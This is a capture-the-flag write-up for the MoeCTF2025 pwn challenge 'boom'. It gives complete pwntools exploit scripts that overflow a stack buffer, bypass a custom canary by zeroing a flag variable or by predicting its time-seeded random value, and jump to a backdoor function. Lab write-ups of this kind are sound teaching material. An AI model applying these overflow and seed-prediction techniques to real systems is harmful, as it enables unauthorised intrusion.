boom

main function (decompiler screenshot in the original post):

init function (decompiler screenshot in the original post):
The challenge ships a backdoor function. Looking at main, the logic is simple: we enter y, a random number is generated and stored as the "canary", v6 is set to 1, and then there is an obvious stack overflow. After that comes a check: to pass it we must have either v6 == 0 or the canary unchanged. Since our overflow is guaranteed to clobber the canary, there are two ways to solve this.

First approach: v6 also lives on the stack, so while overflowing we simply overwrite v6 with 0 as well. Very simple:
```python
# sla, p, flat and p32 come from the pwntools template used in the full EXP below
ret = 0x40101a        # a single `ret` gadget for stack alignment
backdoor = 0x401276   # address of the backdoor function
sla(b"Do you want to brute-force this system? (y/n)", b'y')
payload = flat([
    b"A" * (0x90 - 0x4),   # fill the buffer up to v6 (offsets inferred from the payload layout)
    p32(0),                # v6 = 0, so the canary no longer matters
    b"A" * 0x8,            # saved rbp
    ret,
    backdoor
])
sla(b'Enter your message: ', payload)
p.interactive()
```
We have to use sendline here, because gets keeps reading until it sees a \n.

Second approach: the init function tells us outright that the seed is time(0). Since the generator is pseudo-random, knowing the seed lets us reproduce the random number directly. First, a small C helper that simulates the generation:
```c
#include <stdlib.h>
#include <time.h>

/* Mirrors what the binary's init does: seed with the current time,
   then draw one value reduced modulo 114514. Call it from Python
   in the same second as the target for a matching result. */
int get_canary()
{
    int seed = time(0);
    srandom(seed);
    int canary = random() % 114514;
    return canary;
}
```
Then compile it into a .so so that it can be loaded from the Python script. Because the local and remote clocks may be slightly off and the seed is time(0), if it does not work against the remote target just run it again. Also note that both v6 and the canary are four bytes, so use p32 when overwriting them.
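The seed-to-canary mapping that the C helper above computes, reproduced in pure Python as an added example (this is not code from the writeup): it reimplements glibc's default random() generator (TYPE_3 additive feedback state, 310 discarded outputs after seeding) so the canary can be computed without building a .so, and shows how few distinct values a time(0) seed can yield around a given second. The function and constant names are my own; it assumes the target links against glibc.

```python
import time

LCG_MODULUS = 2147483647   # 2**31 - 1, used by glibc to expand the seed into the state
CANARY_MODULUS = 114514    # the modulus the challenge applies to random()


def glibc_random_outputs(seed, count):
    """Return the first `count` values glibc's random() yields after srandom(seed).

    Pure-Python reimplementation of the default TYPE_3 generator (degree 31, separation 3).
    """
    seed &= 0xFFFFFFFF
    if seed > 0x7FFFFFFF:        # srandom() takes an unsigned int but stores it as int32
        seed -= 0x100000000
    if seed == 0:                # glibc replaces a zero seed with 1
        seed = 1
    r = [0] * 34
    r[0] = seed
    for i in range(1, 31):       # fill the state with a 16807-multiplier LCG
        r[i] = (16807 * r[i - 1]) % LCG_MODULUS
    for i in range(31, 34):      # the additive generator starts by re-reading r[0..2]
        r[i] = r[i - 31]
    outputs = []
    # glibc discards the first 310 results after seeding, so visible outputs start at r[344]
    for i in range(34, 344 + count):
        r.append((r[i - 31] + r[i - 3]) & 0xFFFFFFFF)
        if i >= 344:
            outputs.append(r[i] >> 1)   # random() returns the 32-bit word shifted right by 1
    return outputs


def predict_canary(seed):
    """The challenge's canary for a given seed: random() % 114514 after srandom(seed)."""
    return glibc_random_outputs(seed, 1)[0] % CANARY_MODULUS


def canary_candidates(now=None, max_skew=2):
    """Map every canary reachable from seeds within +/- max_skew seconds of `now` to its seed.

    With a time(0) seed the whole candidate space is a handful of values, which is why a
    random-looking "canary" derived this way offers no real protection.
    """
    now = int(time.time()) if now is None else now
    return {predict_canary(now + d): now + d for d in range(-max_skew, max_skew + 1)}


if __name__ == "__main__":
    print("canary for the current second:", predict_canary(int(time.time())))
    print("candidates within +/-2 s:", sorted(canary_candidates()))
```

The values for seed 1 can be cross-checked against `srandom(1); random();` in C, which yields 1804289383 first.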
EXP:
```python
from pwn import *
import sys

context(arch='amd64', os='linux')
file_name = './pwn'
#libc_name = './libc.so.6'
elf = ELF(file_name)
#libc = ELF(libc_name)
gdb_ = 1 if ('gdb' in sys.argv) else 0
switch = 1 if ('remote' in sys.argv) else 0
debug = 0 if ('deoff' in sys.argv) else 1
if switch:
    target = '127.0.0.1'
    port = 37651
    p = remote(target, port)
else:
    p = process(file_name)
if debug:
    context(log_level='debug')
if gdb_ and switch == 0:
    gdb.attach(p)
    pause()
s = lambda data : p.send(data)
sa = lambda delim, data : p.sendafter(delim, data)
sl = lambda data : p.sendline(data)
sla = lambda delim, data : p.sendlineafter(delim, data)
r = lambda numb=4096 : p.recv(numb)
ru = lambda delim, drop=True : p.recvuntil(delim, drop)
rl = lambda : p.recvline()
lg = lambda name, data : log.success(name + ': ' + hex(data))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))
# search = lambda s : next(libc.search(s if isinstance(s, bytes) else s.encode()))
# def init_libc(leak, offset, name='Libc'):
#     if isinstance(offset, str):
#         offset = libc.sym[offset]
#     libc.address = leak - offset
#     log.success(f"{name} Base: {hex(libc.address)}")
#################################################################################
import ctypes
# load the compiled helper and reproduce the canary with the same time(0) seed
lib = ctypes.CDLL('./getcanary.so')
canary = lib.get_canary()
lg('canary', canary)
ret = 0x40101a        # a single `ret` gadget for stack alignment
backdoor = 0x401276   # address of the backdoor function
sla(b"Do you want to brute-force this system? (y/n)", b'y')
payload = flat([
    b'A' * (0x90 - 0x14),   # fill up to the canary (offsets inferred from the payload layout)
    p32(canary),            # write the predicted canary back so the check still passes
    b'A' * 0x18,            # v6 (non-zero is fine now) and the saved rbp
    ret,
    backdoor
])
sla(b'Enter your message: ', payload)
p.interactive()
```
Challenge link: CTF-Writeups/MoeCTF2025/boom at main · Zenquiem/CTF-Writeups

https://zenquietus.top/archives/wei-ming-ming-wen-zhang-spsQRWd8